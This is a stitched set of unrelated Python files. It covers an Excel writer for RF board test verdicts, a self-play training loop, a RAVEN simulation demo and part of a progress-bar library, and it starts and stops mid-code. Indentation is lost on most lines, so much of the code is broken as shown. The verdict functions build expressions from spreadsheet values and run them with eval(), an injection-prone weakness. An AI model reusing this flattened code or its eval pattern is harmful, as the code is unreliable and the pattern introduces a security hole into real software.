row_idx = row_dict[str(cell_band).upper()]
startrow = row_idx
            dt = sht.range('C{}:E{}'.format(startrow, startrow)).value  # returns a list
return dt
except Exception as e:
raise NotImplementedError('get_txatt_norm error:{}'.format(e))
def write_max_txatt(self, temp=1, **kwargs):
'''
        Update the maximum-gear output values.
temp:0,1,2
kwargs:{'CELL0_E':[[],[],[]],}
:return:
'''
logger.debug('write_max_txatt={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['输出功率测试']
            temp_rows = [['G', 'H', 'I'], ['K', 'L', 'M'], ['O', 'P', 'Q']]  # columns for low/normal/high temperature
            value_row_base, _, norm_row_base = temp_rows[int(temp)]  # value and verdict columns for the selected temperature
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
norm_list = self.get_norm(shtname, rows[0] + self.jump_row)
for key, item in kwargs.items():
row_idx = row_dict[key.upper()]
row_range = value_row_base + str(row_idx)
norm_range = norm_row_base + str(row_idx)
lst = []
norm_lst = []
for each in item:
if each is not None:
power, txatt = each
ret = self.set_ccdf_colusition(power, norm_list)
norm_lst.append(ret)
lst.append([str(power), str(txatt * 100)])
else:
norm_list.append(None)
lst.append([None, None])
sht.range('{}'.format(row_range)).options(expand='table').value = lst
sht.range('{}'.format(norm_range)).options(transpose=True).value = norm_lst
except Exception as e:
logger.error('write_max_txatt error:{}'.format(e))
else:
self.wb.save()
def write_cali(self, temp=1, **kwargs):
'''
        Write the power calibration (compensation) values.
        kwargs: {'': [high-point offset, mid-point offset, low-point offset]}
:return:
'''
logger.debug('write_cali={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['输出功率测试']
            temp_rows = ['F', 'J', 'N']  # columns for low/normal/high temperature
            value_row_base = temp_rows[int(temp)]  # value column for the selected temperature
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
for key, item in kwargs.items():
row_idx = row_dict[key.upper()]
row_range = value_row_base + str(row_idx)
sht.range('{}'.format(row_range)).options(transpose=True).value = item
except Exception as e:
logger.error('write_cali error:{}'.format(e))
else:
self.wb.save()
def get_each_cellband_row(self, shtname, start, end):
'''
        Get the row where each cell_band sits within a sub-table.
:return:{'CELL0_E':68}
'''
sht = self.wb.sheets(shtname)
rng = sht.range('A{}:A{}'.format(start, end))
lst = rng.value
cell_dict = {} # {}
for idx, cell in enumerate(lst):
if cell is None:
continue
cell = cell.upper()
            newcell = cell[cell.rfind('CELL'):]  # row titles look like 8125_0_CELL0_E; keep only the CELL0_E part
cell_dict.setdefault(newcell, idx + start)
return cell_dict
def write_ACPR(self, temp=1, **kwargs):
'''
        Update the ACPR results.
:param kwargs:{'cell0_E':[(txatt,power,adj_lower,adj_upper),(),()]}
:return:
'''
# logger.debug('write_ACPR={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['ACPR测试']
            temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']]  # columns for low/normal/high temperature
            value_row_base, norm_row_base = temp_rows[int(temp)]  # value and verdict columns for the selected temperature
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
norm_list = self.get_norm(shtname, rows[0] + self.jump_row)
for key, item in kwargs.items():
row_idx = row_dict[key.upper()]
row_range = value_row_base + str(row_idx)
norm_range = norm_row_base + str(row_idx)
lst = []
norm_lst = []
for each in item:
_, _, adj_lower, adj_upper = each
ret = self.set_ACPR_colusition([adj_lower, adj_upper], norm_list)
norm_lst.append(ret)
lst.append('{}/{}'.format(adj_lower, adj_upper))
sht.range('{}'.format(row_range)).options(transpose=True).value = lst
sht.range('{}'.format(norm_range)).options(transpose=True).value = norm_lst
except Exception as e:
logger.error('write ACPR error:{}'.format(e))
else:
self.wb.save()
def set_ACPR_colusition(self, lst, nlst):
'''
        Multiple values, a single overall verdict.
:param lst:
:param nlst:
:return:
'''
try:
if nlst is None:
return None
indicator1 = None
indicator2 = None
con_list = []
new_norm = [float(re.findall(r'-?\d+\.?\d*e?-?\d*?', str(item))[0])
if item is not None else None for
item in nlst]
if new_norm[0] is not None:
indicator1 = '>=' + str(new_norm[0])
if new_norm[2] is not None:
indicator2 = '<=' + str(new_norm[2])
for item in lst:
if indicator1 and indicator2:
e1 = str(item) + indicator1
e2 = str(item) + indicator2
if eval(e1) and eval(e2):
con_list.append('PASS')
else:
con_list.append('FAIL')
elif indicator1:
e1 = str(item) + indicator1
if eval(e1):
con_list.append('PASS')
else:
return 'FAIL'
elif indicator2:
e1 = str(item) + indicator2
if eval(e1):
con_list.append('PASS')
else:
return 'FAIL'
if not con_list:
return None
return 'PASS' if all(con_list) else 'FAIL'
except Exception as e:
logger.error('set_acpr_conclusion error:{}'.format(e))
return None
def get_norm(self, shtname, startrow):
'''
        Read the ACPR spec limits.
        :return: [lower limit, nominal value, upper limit]
'''
try:
sht = self.wb.sheets(shtname)
dt = sht.range('C{}:E{}'.format(startrow, startrow)).value
return dt
except Exception as e:
logger.exception('get_norm error:{}'.format(e))
return None
def write_ccdf(self, temp=1, **kwargs):
'''
{'B41':[(ppm,crest factor),(ppm,crest factor),(ppm,crest factor)]}
:return:
'''
logger.debug('write_ccdf={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
ppm_rows = self.dl_rows['频偏测试']
cf_rows = self.dl_rows['峰均比测试']
            temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']]  # columns for low/normal/high temperature
            value_row_base, norm_row_base = temp_rows[int(temp)]  # value and verdict columns for the selected temperature
ppm_row_dict = self.get_each_cellband_row(shtname, ppm_rows[0], ppm_rows[1])
cf_row_dict = self.get_each_cellband_row(shtname, cf_rows[0], cf_rows[1])
            ppm_norm = self.get_norm(shtname, ppm_rows[0] + self.jump_row)  # spec limits
            cf_norm = self.get_norm(shtname, cf_rows[0] + self.jump_row)  # spec limits
for key, item in kwargs.items():
ppm_row_range = value_row_base + str(ppm_row_dict[str(key).upper()])
cf_row_range = value_row_base + str(cf_row_dict[str(key).upper()])
ppm_pass_range = norm_row_base + str(ppm_row_dict[str(key).upper()])
cf_pass_range = norm_row_base + str(cf_row_dict[str(key).upper()])
lst1 = []
lst2 = []
ppm_lst = []
cf_lst = []
for each in item:
if each is None:
lst1.append('')
lst2.append('')
ppm_lst.append('')
cf_lst.append('')
continue
ppm, cf = each
ppm_lst.append(self.set_ccdf_colusition(ppm, ppm_norm))
cf_lst.append(self.set_ccdf_colusition(cf, cf_norm))
lst1.append('{}'.format(ppm))
lst2.append('{}'.format(cf))
sht.range('{}'.format(ppm_row_range)).options(transpose=True).value = lst1
sht.range('{}'.format(cf_row_range)).options(transpose=True).value = lst2
                sht.range('{}'.format(ppm_pass_range)).options(transpose=True).value = ppm_lst  # write verdicts
                sht.range('{}'.format(cf_pass_range)).options(transpose=True).value = cf_lst  # write verdicts
except Exception as e:
logger.error('write ccdf error:{}'.format(e))
else:
self.wb.save()
def set_ccdf_colusition(self, ppm, norm_list):
'''
        Check that a single value satisfies the lower and upper limits.
:param ppm: ppm/crest factor
        :param norm_list: [lower limit, nominal value, upper limit]
:return:
'''
try:
if ppm is None:
return 'FAIL'
if norm_list is None:
return ''
flag_lst = []
new_norm = [float(re.findall(r'-?\d+\.?\d*e?-?\d*?', str(item))[0])
if item is not None else None for
item in norm_list]
if new_norm[0] is not None:
indicator = '>='
if indicator:
e1 = str(ppm) + indicator + str(new_norm[0])
if eval(e1):
flag_lst.append(True)
else:
return 'FAIL'
if new_norm[2] is not None:
indicator = '<='
if indicator:
e1 = str(ppm) + indicator + str(new_norm[2])
if eval(e1):
flag_lst.append(True)
else:
return 'FAIL'
if not flag_lst:
return ''
return 'PASS' if all(flag_lst) else 'FAIL'
except Exception as e:
logger.exception(e)
return ''
def write_EVM(self, temp=1, **kwargs):
'''
:return:
'''
logger.debug('write_EVM_dict={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
evm_rows = self.dl_rows['EVM测试']
            temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']]  # columns for low/normal/high temperature
            value_row_base, norm_row_base = temp_rows[int(temp)]  # value and verdict columns for the selected temperature
row_dict = self.get_each_cellband_row(shtname, evm_rows[0], evm_rows[1])
norm_list = self.get_norm(shtname, evm_rows[0] + self.jump_row)
for key, item in kwargs.items():
evm_range = value_row_base + str(row_dict[str(key).upper()])
evm_pass_range = norm_row_base + str(row_dict[str(key).upper()])
pass_lst = []
for evm_value in item:
pass_lst.append(self.set_ccdf_colusition(evm_value, norm_list))
sht.range('{}'.format(evm_range)).options(transpose=True).value = item
sht.range('{}'.format(evm_pass_range)).options(transpose=True).value = pass_lst
except Exception as e:
logger.error('write EVM error:{}'.format(e))
else:
self.wb.save()
def write_powerspectrum(self, temp=1, **kwargs):
'''
:return:
'''
logger.debug('write_powerspectrum={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['占用带宽测试']
            temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']]  # columns for low/normal/high temperature
            value_row_base, norm_row_base = temp_rows[int(temp)]  # value and verdict columns for the selected temperature
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
norm_list = self.get_norm(shtname, rows[0] + self.jump_row)
for key, item in kwargs.items():
ps_range = value_row_base + str(row_dict[str(key).upper()])
ps_pass_range = norm_row_base + str(row_dict[str(key).upper()])
pass_lst = []
for ps_value in item:
pass_lst.append(self.set_ccdf_colusition(ps_value, norm_list))
sht.range('{}'.format(ps_range)).options(transpose=True).value = item
sht.range('{}'.format(ps_pass_range)).options(transpose=True).value = pass_lst
except Exception as e:
logger.error('write_powerspectrum error:{}'.format(e))
else:
self.wb.save()
def write_txatt_conclusion(self, temp=1):
'''
        temp: 0 = low temperature, 1 = normal temperature, 2 = high temperature
        Update the verdicts for output power, in-band ripple and Tx adjustable accuracy.
:return:
'''
try:
            power_row = self.dl_rows['输出功率测试']  # output power value and verdict columns
            ripple_row = self.dl_rows['带内波动测试']  # in-band ripple values and verdicts
gear_row = self.dl_rows['可调精度测试'] # ['H60:H74', 'I60:I74']
temp_rows = [['F', 'H', 'F', 'G', 'F', 'G'], ['I', 'K', 'H', 'I', 'H', 'I'], ['L', 'N', 'J', 'K', 'J', 'K']]
power_row_base, power_con_base, ripple_row_base, ripple_con_base, gear_row_base, gear_con_base = temp_rows[
int(temp)]
shtname = BoardExcel.sheets_name[0]
sht = self.wb.sheets(shtname)
power_list = sht.range(
'{}{}:{}{}'.format(power_row_base, power_row[0] + 3, power_row_base, power_row[1])).value
power_norm_dict = self.get_norm(shtname, power_row[0] + self.jump_row)
            power_con_list = self.set_power_conclusion(power_list, power_norm_dict)  # output power verdicts
sht.range('{}{}:{}{}'.format(power_con_base, power_row[0] + 3, power_con_base, power_row[1])).options(
transpose=True).value = power_con_list
ripple_list = sht.range(
                '{}{}:{}{}'.format(ripple_row_base, ripple_row[0] + 3, ripple_row_base, ripple_row[1])).value  # in-band ripple
ripple_norm_list = self.get_norm(shtname, ripple_row[0] + self.jump_row)
ripple_con_list = self.set_power_conclusion(ripple_list, ripple_norm_list)
sht.range('{}{}:{}{}'.format(ripple_con_base, ripple_row[0] + 3, ripple_con_base, ripple_row[1])).options(
                transpose=True).value = ripple_con_list  # in-band ripple verdicts
gear_list = sht.range(
                '{}{}:{}{}'.format(gear_row_base, gear_row[0] + 3, gear_row_base, gear_row[1])).value  # adjustable accuracy
gear_norm_list = self.get_norm(shtname, gear_row[0] + self.jump_row)
gear_con_list = self.set_power_conclusion(gear_list, gear_norm_list)
sht.range('{}{}:{}{}'.format(gear_con_base, gear_row[0] + 3, gear_con_base, gear_row[1])).options(
transpose=True).value = gear_con_list
except Exception as e:
logger.error('write_txatt_conclusion error:{}'.format(e))
else:
self.wb.save()
def set_power_conclusion(self, power_list, norm_dict):
try:
indicator1 = None
indicator2 = None
con_list = []
for key, item in norm_dict.items():
value = float(re.findall(r'-?\d+\.?\d*e?-?\d*?', str(item))[0]) if item is not None else None
if value is None:
continue
if '上限' in key:
indicator1 = '<=' + str(value)
elif '下限' in key:
indicator2 = '>=' + str(value)
for power in power_list:
if indicator1 and indicator2:
e1 = str(power) + indicator1
e2 = str(power) + indicator2
if eval(e1) and eval(e2):
con_list.append('PASS')
else:
con_list.append('FAIL')
elif indicator1:
e1 = str(power) + indicator1
if eval(e1):
con_list.append('PASS')
else:
con_list.append('FAIL')
elif indicator2:
e1 = str(power) + indicator2
if eval(e1):
con_list.append('PASS')
else:
con_list.append('FAIL')
return con_list
except Exception as e:
logger.error('set_power_conclusion error:{}'.format(e))
return None
def write_DANL(self, temp=1, **kwargs):
'''
        Noise floor (DANL).
:param kwargs:
:return:
'''
logger.debug('write_DANL_dict={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
danl_rows = self.dl_rows['底噪测试']
            temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']]  # columns for low/normal/high temperature
            value_row_base, norm_row_base = temp_rows[int(temp)]  # value and verdict columns for the selected temperature
row_dict = self.get_each_cellband_row(shtname, danl_rows[0], danl_rows[1])
norm_list = self.get_norm(shtname, danl_rows[0] + self.jump_row)
for key, item in kwargs.items():
danl_range = value_row_base + str(row_dict[str(key).upper()])
danl_pass_range = norm_row_base + str(row_dict[str(key).upper()])
pass_lst = []
for danl_value in item:
pass_lst.append(self.set_ccdf_colusition(danl_value, norm_list))
sht.range('{}'.format(danl_range)).options(transpose=True).value = item
sht.range('{}'.format(danl_pass_range)).options(transpose=True).value = pass_lst
except Exception as e:
logger.error('write EVM error:{}'.format(e))
else:
self.wb.save()
def write_current(self, temp=1, **kwargs):
'''
        Operating current.
:param kwargs:
:return:
'''
logger.debug('write_current_dict={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
cur_rows = self.dl_rows['工作电流测试']
            temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']]  # columns for low/normal/high temperature
            value_row_base, norm_row_base = temp_rows[int(temp)]  # value and verdict columns for the selected temperature
row_dict = self.get_each_cellband_row(shtname, cur_rows[0], cur_rows[1])
norm_list = self.get_norm(shtname, cur_rows[0] + self.jump_row)
for key, item in kwargs.items():
cur_range = value_row_base + str(row_dict[str(key).upper()])
cur_pass_range = norm_row_base + str(row_dict[str(key).upper()])
pass_lst = []
for cur_value in item:
pass_lst.append(self.set_ccdf_colusition(cur_value, norm_list))
sht.range('{}'.format(cur_range)).options(transpose=True).value = item
sht.range('{}'.format(cur_pass_range)).options(transpose=True).value = pass_lst
except Exception as e:
logger.error('write_current error:{}'.format(e))
else:
self.wb.save()
def close_file(self):
try:
if hasattr(self, 'wb'):
self.wb.close()
del self.wb
if hasattr(self, 'app'):
self.app.quit()
del self.app
# logger.debug('close excel..')
except Exception as e:
logger.error('{}'.format(e))
if __name__ == '__main__':
xel = BoardExcel()
xel.open_excel('EB2.xlsx')
# df = xel.get_band_para()
xel.get_dl_rows()
# xel.get_normaltemp_level_rows()
    # print(df['中', '频点'].apply(lambda x: int(x)))  # returns a Series
# s1 = df.loc['B41', (slice(None), '频点')] # series
# print(s1.values) # list
# dt=xel.get_txatt_norm()
# print(dt)
# 3.
# dt = {'cell0_E': [
# ['0.61', '-0.15', '-0.33', '-0.25', '-0.53', '1.53', '0.69', '1.23', '1.24',
# '1.26', '1.17', '1.39', '0.64',
# '1.26', '-0.34', '-0.27', '1.05', '-0.01', '1.43', '-0.46'],
# ['1.56', '-0.04', '0.73', '0.77', '0.80', '1.15', '0.48', '0.98', '0.95', '0.80', '-0.96', '0.83', '1.10',
# '-0.53', '1.76', '-0.84', '0.14', '0.38', '-0.85', '0.28'],
# ['0.61', '0.48', '-1.23', '0.64', '-0.89', '-0.59', '1.41', '0.60', '-1.18', '-1.01', '0.59', '0.41', '1.20',
# '0.52', '0.36', '-0.69', '-1.17', '-0.82', '-0.97', '-1.23']]}
#
# xel.write_power_range(**dt)
# 4.
# dt = {'cell0_E': [(0,-1,-25,-35),(0,-1.2,-20,-30)]}
# xel.write_ACPR(**dt)
# 5.
# dt = {'cell0_e': [(0, -1), (1, -2), (2, -3)]}
# xel.write_ccdf(**dt)
# print(xel.get_ACPR_norm())
# 6.
# xel.write_EVM(**{'cell0_E':[11, 1.09, 1.13]})
# 7.
# xel.write_powerspectrum(**{'cell0_E': [11, 4.6, 4.5]})
# xel.close_file()
# a = xel.get_normaltemp_level_rows()
# a=xel.get_txatt_norm()
# 1.
# a=xel.get_max_row_in_temp('cell1_b1')
# print(a)
# 2.
xel.get_set_condition('0')
dt = {'cell0_E': [[23, 7, -1, -1]]}
xel.write_max_txatt(**dt)
dt = {'cell0_E': [11, 22, 33.8]}
xel.write_cali(**dt)
xel.write_bbver_sn('123', '456')
# xel.write_txatt_conclusion()
# 4.
# xel.write_current(**{'cell0_E': [1.4, 1.09, 1.13]})
xel.close_file()
|
import numpy as np
from nn.nn import NN
from config import config
from mcts import UCTPlayGame
import cPickle as pickle
import os
if __name__ == "__main__":
""" Play a single game to the end using UCT for both players.
"""
nn = NN(config)
nn.setup()
pickle.dump(config, open(os.path.join(config.save_path, 'config.pkl'), 'wb'), pickle.HIGHEST_PROTOCOL)
batch_data = {}
batch_data['s'], batch_data['pi'], batch_data['z'] = ([], [], [])
data_path = os.path.join(config.save_path, 'batch_data_iter_{}.pkl')
data_paths = sorted([path for path in os.listdir(config.save_path) if 'batch_data_iter_' in path])
if data_paths != []:
batch_data = pickle.load(open(os.path.join(config.save_path, data_paths[-1]), "rb"))
for k in batch_data.keys(): # remove oldest 25% from buffer
batch_data[k] = batch_data[k][int(0.25*config.buffer_size):]
for iteration in range(config.eval_freq):
# Collect self-play data from MCTS
while len(batch_data['s']) < config.buffer_size:
if config.verbose:
print('Current data size: {}'.format(len(batch_data['s'])))
data = UCTPlayGame(nn)
for k in batch_data.keys():
batch_data[k].extend(data[k])
print "Finished collecting self-play data from iteration %d" % iteration
nn.train((batch_data['s'], batch_data['pi'], batch_data['z']))
print "Saving batch data..."
fn = data_path.format(iteration)
pickle.dump(batch_data, open(fn, 'wb'), pickle.HIGHEST_PROTOCOL)
print "Done saving {}".format(fn)
print "Finished training on self-play data from iteration %d" % iteration
for k in batch_data.keys(): # remove oldest 25% from buffer
batch_data[k] = batch_data[k][int(0.25*config.buffer_size):]
|
from .knn import NNClassifier
from .sklearn import SKLearnKnnClassifier, SKLearnSVMClassifier
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Demonstrate running RAVEN in Python workflows.
Created on Nov 3, 2021
@author: aalfonsi
"""
import os
import sys
import matplotlib.pyplot as plt
# note: we use this complicated way to find RAVEN because we don't know how RAVEN
# is installed on specific machines; it can be simplified greatly for specific applications
frameworkDir = os.path.abspath(os.path.join(*([os.path.dirname(__file__)]+[os.pardir]*3+['framework'])))
sys.path.append(frameworkDir)
thisDir = os.path.abspath(os.path.dirname(__file__))
frameworkTestDir = os.path.abspath(os.path.join(frameworkDir, '../tests', 'framework'))
targetWorkflow = os.path.join(frameworkTestDir, 'test_rom_trainer.xml')
# import Driver for now
import Driver
# import simulation
from Simulation import Simulation as sim
import utils.TreeStructure as TS
# instantiate a RAVEN Simulation instance
ravenSim = sim(frameworkDir, verbosity="all")
# set input files (this could be encapsulated in a Simulation method, together with the XML reader)
ravenSim.setInputFiles([targetWorkflow])
# read tree (XML input)
tree = TS.parse(open(targetWorkflow,'r'))
# read entities (this part can be encapsulated in a simulation method)
ravenSim.XMLpreprocess(tree.getroot(),os.path.dirname(os.path.abspath(targetWorkflow)))
ravenSim.XMLread(tree.getroot(),runInfoSkip=set(["DefaultInputFile"]),xmlFilename=targetWorkflow)
# ready to initiate the simulation
ravenSim.initialize()
# At this point there are two options:
# either we run the full simulation via the simulation's run() method,
# or we run one step at a time (so we can actually interact with the simulation).
# Let's follow the second approach, since the first approach would be
# simply: ravenSim.run()
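# A hedged sketch of that first, non-interactive approach (comments only; it uses
# nothing beyond the objects already set up above plus the run() method just mentioned):
#
#   ravenSim.run()                  # the "full simulation" path described above
#   ravenSim.finalizeSimulation()
#
# The step-by-step loop below is used instead so we can inspect data objects mid-run.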
# get all steps
allSteps = ravenSim.stepSequence()
for name in allSteps:
inputs, step = ravenSim.initiateStep(name)
    # running a step
ravenSim.executeStep(inputs, step)
if name == 'test_extract_for_rom_trainer':
# acquire and plot data from a data object while we are running the step
ps = ravenSim.getEntity('DataObjects', 'Pointset_from_database_for_rom_trainer')
data = ps.asDataset()# see xarray docs
data.plot.scatter(x="DeltaTimeScramToAux", y="DG1recoveryTime", hue="CladTempThreshold")
        # save the plots next to this script (thisDir) so they are easy to find
plt.savefig(os.path.join(thisDir,"firstplot.png"))
data.plot.scatter(x="DeltaTimeScramToAux", y="CladTempThreshold", hue="DG1recoveryTime")
plt.savefig(os.path.join(thisDir,"secondplot.png"))
# modify the data before going in the rom trainer
data['DeltaTimeScramToAux']*=1.01
# finalize the simulation
ravenSim.finalizeSimulation()
|
from __future__ import division, absolute_import, with_statement
import io
import sys
import math
import logging
import warnings
from datetime import datetime, timedelta
import collections
from . import widgets
from . import widgets as widgets_module # Avoid name collision
from . import six
from . import utils
from . import base
logger = logging.getLogger()
class ProgressBarMixinBase(object):
def __init__(self, **kwargs):
pass
def start(self, **kwargs):
pass
def update(self, value=None):
pass
def finish(self): # pragma: no cover
pass
class ProgressBarBase(collections.Iterable, ProgressBarMixinBase):
pass
class DefaultFdMixin(ProgressBarMixinBase):
def __init__(self, fd=sys.stderr, **kwargs):
self.fd = fd
ProgressBarMixinBase.__init__(self, **kwargs)
def update(self, *args, **kwargs):
ProgressBarMixinBase.update(self, *args, **kwargs)
self.fd.write('\r' + self._format_line())
def finish(self, *args, **kwargs): # pragma: no cover
ProgressBarMixinBase.finish(self, *args, **kwargs)
self.fd.write('\n')
class ResizableMixin(ProgressBarMixinBase):
def __init__(self, term_width=None, **kwargs):
ProgressBarMixinBase.__init__(self, **kwargs)
self.signal_set = False
if term_width:
self.term_width = term_width
else:
try:
self._handle_resize()
import signal
self._prev_handle = signal.getsignal(signal.SIGWINCH)
signal.signal(signal.SIGWINCH, self._handle_resize)
self.signal_set = True
except Exception: # pragma: no cover
pass
def _handle_resize(self, signum=None, frame=None):
'Tries to catch resize signals sent from the terminal.'
w, h = utils.get_terminal_size()
self.term_width = w
def finish(self): # pragma: no cover
ProgressBarMixinBase.finish(self)
if self.signal_set:
try:
import signal
signal.signal(signal.SIGWINCH, self._prev_handle)
            except Exception:  # pragma: no cover
pass
class StdRedirectMixin(DefaultFdMixin):
def __init__(self, redirect_stderr=False, redirect_stdout=False, **kwargs):
DefaultFdMixin.__init__(self, **kwargs)
self.redirect_stderr = redirect_stderr
self.redirect_stdout = redirect_stdout
self._stdout = self.stdout = sys.stdout
self._stderr = self.stderr = sys.stderr
def start(self, *args, **kwargs):
self.stderr = self._stderr = sys.stderr
if self.redirect_stderr:
self.stderr = sys.stderr = six.StringIO()
self.stdout = self._stdout = sys.stdout
if self.redirect_stdout:
self.stdout = sys.stdout = six.StringIO()
DefaultFdMixin.start(self, *args, **kwargs)
def update(self, value=None):
try:
if self.redirect_stderr and sys.stderr.tell():
self.fd.write('\r' + ' ' * self.term_width + '\r')
# Not atomic unfortunately, but writing to the same stream
# from multiple threads is a bad idea anyhow
self._stderr.write(sys.stderr.getvalue())
sys.stderr.seek(0)
sys.stderr.truncate(0)
self._stderr.flush()
except (io.UnsupportedOperation, AttributeError): # pragma: no cover
            logger.warning('Disabling stderr redirection, %r is not seekable',
                           sys.stderr)
self.redirect_stderr = False
try:
if self.redirect_stdout and sys.stdout.tell():
self.fd.write('\r' + ' ' * self.term_width + '\r')
# Not atomic unfortunately, but writing to the same stream
# from multiple threads is a bad idea anyhow
self._stdout.write(sys.stdout.getvalue())
sys.stdout.seek(0)
sys.stdout.truncate(0)
self._stdout.flush()
except (io.UnsupportedOperation, AttributeError): # pragma: no cover
            logger.warning('Disabling stdout redirection, %r is not seekable',
                           sys.stdout)
self.redirect_stdout = False
DefaultFdMixin.update(self, value=value)
def finish(self):
DefaultFdMixin.finish(self)
if self.redirect_stderr and hasattr(sys.stderr, 'getvalue'):
self._stderr.write(sys.stderr.getvalue())
self.stderr = sys.stderr = self._stderr
if self.redirect_stdout and hasattr(sys.stdout, 'getvalue'):
self._stdout.write(sys.stdout.getvalue())
self.stdout = sys.stdout = self._stdout
class ProgressBar(StdRedirectMixin, ResizableMixin, ProgressBarBase):
'''The ProgressBar class which updates and prints the bar.
A common way of using it is like:
>>> progress = ProgressBar().start()
>>> for i in range(100):
... progress.update(i+1)
... # do something
...
>>> progress.finish()
You can also use a ProgressBar as an iterator:
>>> progress = ProgressBar()
>>> some_iterable = range(100)
>>> for i in progress(some_iterable):
... # do something
... pass
...
Since the progress bar is incredibly customizable you can specify
different widgets of any type in any order. You can even write your own
widgets! However, since there are already a good number of widgets you
should probably play around with them before moving on to create your own
widgets.
The term_width parameter represents the current terminal width. If the
parameter is set to an integer then the progress bar will use that,
otherwise it will attempt to determine the terminal width falling back to
80 columns if the width cannot be determined.
When implementing a widget's update method you are passed a reference to
the current progress bar. As a result, you have access to the
ProgressBar's methods and attributes. Although there is nothing preventing
you from changing the ProgressBar you should treat it as read only.
Useful methods and attributes include (Public API):
- value: current progress (min_value <= value <= max_value)
- max_value: maximum (and final) value
- finished: True if the bar has finished (reached 100%)
- start_time: the time when start() method of ProgressBar was called
     - seconds_elapsed: seconds elapsed between start_time and the last call
       to update
'''
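    # A short usage sketch of the customization described in the docstring above
    # (hedged; it only uses widget classes this module itself references, e.g. in
    # default_widgets() further down):
    #
    #   bar = ProgressBar(max_value=1000,
    #                     widgets=[widgets.Percentage(), ' ',
    #                              widgets.Bar(), ' ',
    #                              widgets.Timer()])
    #   for i in range(1000):
    #       bar.update(i + 1)
    #   bar.finish()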
_DEFAULT_MAXVAL = 100
def __init__(self, min_value=0, max_value=None, widgets=None,
left_justify=True, initial_value=0, poll_interval=None,
widget_kwargs=None,
**kwargs):
'''Initializes a progress bar with sane defaults'''
StdRedirectMixin.__init__(self, **kwargs)
ResizableMixin.__init__(self, **kwargs)
ProgressBarBase.__init__(self, **kwargs)
if not max_value and kwargs.get('maxval'):
warnings.warn('The usage of `maxval` is deprecated, please use '
'`max_value` instead', DeprecationWarning)
max_value = kwargs.get('maxval')
if not poll_interval and kwargs.get('poll'):
warnings.warn('The usage of `poll` is deprecated, please use '
'`poll_interval` instead', DeprecationWarning)
poll_interval = kwargs.get('poll')
if max_value:
if min_value > max_value:
raise ValueError('Max value needs to be bigger than the min '
'value')
self.min_value = min_value
self.max_value = max_value
self.widgets = widgets
self.widget_kwargs = widget_kwargs or {}
self.left_justify = left_justify
self._iterable = None
self.previous_value = None
self.value = initial_value
self.last_update_time = None
self.start_time = None
self.updates = 0
self.end_time = None
self.extra = dict()
if poll_interval and isinstance(poll_interval, (int, float)):
poll_interval = timedelta(seconds=poll_interval)
self.poll_interval = poll_interval
        # A dictionary mapping DynamicMessage widget names to their current values
self.dynamic_messages = {}
for widget in (self.widgets or []):
if isinstance(widget, widgets_module.DynamicMessage):
self.dynamic_messages[widget.name] = None
@property
def percentage(self):
'''Return current percentage, returns None if no max_value is given
>>> progress = ProgressBar()
>>> progress.max_value = 10
>>> progress.min_value = 0
>>> progress.value = 0
>>> progress.percentage
0.0
>>>
>>> progress.value = 1
>>> progress.percentage
10.0
>>> progress.value = 10
>>> progress.percentage
100.0
>>> progress.min_value = -10
>>> progress.percentage
100.0
>>> progress.value = 0
>>> progress.percentage
50.0
>>> progress.value = 5
>>> progress.percentage
75.0
>>> progress.value = -5
>>> progress.percentage
25.0
>>> progress.max_value = None
>>> progress.percentage
'''
if self.max_value is None or self.max_value is base.UnknownLength:
return None
elif self.max_value:
todo = self.value - self.min_value
total = self.max_value - self.min_value
percentage = todo / total
else:
percentage = 1
return percentage * 100
def data(self):
'''
Variables available:
- max_value: The maximum value (can be None with iterators)
- value: The current value
- total_seconds_elapsed: The seconds since the bar started
- seconds_elapsed: The seconds since the bar started modulo 60
- minutes_elapsed: The minutes since the bar started modulo 60
- hours_elapsed: The hours since the bar started modulo 24
        - days_elapsed: The days since the bar started
- time_elapsed: Shortcut for HH:MM:SS time since the bar started
including days
- percentage: Percentage as a float
        - dynamic_messages: A dictionary of user-defined DynamicMessage values
'''
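        # Hedged sketch of a consumer of this dict: judging from _format_widgets()
        # below, any callable accepting (progressbar, data) can act as a widget, so a
        # hypothetical plain-function widget could read these keys directly:
        #
        #   def fraction_widget(progress, data):
        #       return '{value}/{max_value}'.format(**data)
        #
        #   ProgressBar(max_value=10, widgets=[fraction_widget, ' ', widgets.Bar()])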
self.last_update_time = datetime.now()
elapsed = self.last_update_time - self.start_time
        # For Python 2.7 and higher we have `timedelta.total_seconds()`, but we
        # want to support older versions as well
total_seconds_elapsed = utils.timedelta_to_seconds(elapsed)
return dict(
# The maximum value (can be None with iterators)
max_value=self.max_value,
# Start time of the widget
start_time=self.start_time,
# Last update time of the widget
last_update_time=self.last_update_time,
# End time of the widget
end_time=self.end_time,
# The current value
value=self.value,
# The previous value
previous_value=self.previous_value,
